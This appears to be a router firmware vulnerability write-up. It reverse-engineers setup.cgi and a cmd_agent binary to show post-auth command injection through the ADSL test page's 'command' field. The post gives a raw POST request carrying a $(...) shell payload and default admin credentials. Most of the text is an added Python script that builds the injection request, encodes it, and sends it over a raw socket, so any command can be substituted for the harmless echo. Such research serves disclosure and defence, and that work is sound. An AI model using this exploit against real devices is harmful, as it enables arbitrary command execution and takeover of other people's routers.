We will keep the same hierarchy as in the previous post.

Firmware version v1.05.00

Command injection in the ADSL test functionality (post-auth)

Looking into /usr/sbin/setup.cgi with Ghidra

Using Ghidra's string search, I found that the string “command” is expected within the function FUN_00405d44. Moreover, it is the only occurrence of this string in the CGI binary.


So let's look at what the COMMAND function does.


The COMMAND function seems to format its first parameter (a format string) with its second parameter (the value we control) and write the result to the file /etc/cmd_agent.

Using the root shell obtained through the UART port, let's see what happens when something is written into /etc/cmd_agent.


We observe that the command written to /etc/cmd_agent is executed.


Running ps shows that a binary with a name similar to that file is running:

  • /usr/sbin/cmd_agent_ap

Let's look at what this binary does in Ghidra.


It is therefore this binary that reads the contents of /etc/cmd_agent and executes them through the system() function. All that remains is to identify the HTTP request that lets us execute arbitrary system commands.


Example of a POST request to exploit the vulnerability:

POST /setup.cgi HTTP/1.1
Host: 10.X.X.1
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Length: 132

command=$(/bin/busybox echo HIT>/tmp/POC %26%26 /bin/busybox echo ADIAGRALL)&tone=1&go=++Go++&next_file=adsl_test.htm&todo=adsl_test

It should be noted that this is also exploitable via an HTTP GET request, with the same parameters passed in the query string instead of the request body.


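The following script is an added example (not code from the original post) that rebuilds the POST request shown above byte for byte and a GET variant, so the two encoding details the injection depends on are explicit: the `&&` separator must be sent as `%26%26` or the CGI's form parser would split the command at the ampersand, and the value is wrapped in `$(...)` so the shell spawned by system() evaluates it regardless of what COMMAND's format string puts around it. The Content-Length is computed rather than typed. Assumptions: the credentials admin:password are decoded from the post's Authorization header, the host placeholder is the post's own 10.X.X.1, and the GET form simply moves the same fields into the query string (the post states GET works but does not show the exact URL).

```python
import base64
import socket

# Target and credentials. The host placeholder is the one used in the post;
# admin:password is an assumption decoded from the post's Basic header.
HOST = "10.X.X.1"
PORT = 80
USERNAME = "admin"
PASSWORD = "password"

# The shell command that ends up in /etc/cmd_agent and is run by cmd_agent_ap
# through system(). Wrapping it in $(...) makes the shell evaluate it first,
# whatever COMMAND's format string places around the injected value.
POC_COMMAND = "/bin/busybox echo HIT>/tmp/POC && /bin/busybox echo ADIAGRALL"

# Remaining form fields of the ADSL test page (adsl_test.htm), copied from
# the request in the post. '++Go++' is the form's own encoding of '  Go  '.
FORM_FIELDS = [("tone", "1"), ("go", "++Go++"),
               ("next_file", "adsl_test.htm"), ("todo", "adsl_test")]


def encode_command_value(cmd: str) -> str:
    """Percent-encode only what would break the CGI's form parsing.

    A raw '&' would be consumed by the key=value splitter as the start of
    the next field and never reach the shell, so '&&' must be sent as
    '%26%26'. '%' is escaped first so the result is unambiguous; '+' would
    be decoded to a space; '#' would truncate a GET query string. Everything
    else ('$', '(', ')', '>', '/', spaces) is left as-is, as in the post.
    """
    value = f"$({cmd})"
    for raw, enc in (("%", "%25"), ("&", "%26"), ("+", "%2B"), ("#", "%23")):
        value = value.replace(raw, enc)
    return value


def build_body(cmd: str) -> str:
    """x-www-form-urlencoded body: injected 'command' first, then the form fields."""
    fields = [("command", encode_command_value(cmd))] + FORM_FIELDS
    return "&".join(f"{k}={v}" for k, v in fields)


def basic_auth(user: str, password: str) -> str:
    """HTTP Basic credential as sent in the Authorization header."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def build_post_request(cmd: str, host: str = HOST) -> bytes:
    """The POST /setup.cgi request from the post, with a computed Content-Length."""
    body = build_body(cmd)
    headers = [
        "POST /setup.cgi HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Authorization: {basic_auth(USERNAME, PASSWORD)}",
        f"Content-Length: {len(body.encode())}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode()


def build_get_request(cmd: str, host: str = HOST) -> bytes:
    """GET variant (assumed layout: the same fields moved into the query string)."""
    headers = [
        f"GET /setup.cgi?{build_body(cmd)} HTTP/1.1",
        f"Host: {host}",
        f"Authorization: {basic_auth(USERNAME, PASSWORD)}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode()


def send_raw(request: bytes, host: str = HOST, port: int = PORT,
             timeout: float = 5.0) -> bytes:
    """Send a raw request and return the response bytes. A raw socket is used
    on purpose: an HTTP library would re-encode '$', '(' or '>' and alter the
    payload the post relies on."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Print the request instead of sending it; point HOST at a lab device
    # and call send_raw() to reproduce the post's proof of concept.
    print(build_post_request(POC_COMMAND).decode())
```

The script only prints the request by default; on a lab device, check for /tmp/POC through the UART shell after calling send_raw(), as the post does, since the HTTP response itself says nothing about whether cmd_agent_ap picked the command up.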

Several other paths to the COMMAND function were identified, in the following functions:

  • FUN_00405d44()
  • FUN_004084c8()
  • FUN_00408a30()
  • FUN_0040a560()
  • FUN_0040a644()

The next post will describe how it is possible to find the backdoor discovered by Eloi Benoist-Vanderbeken by looking for post-auth accessible vulnerabilities.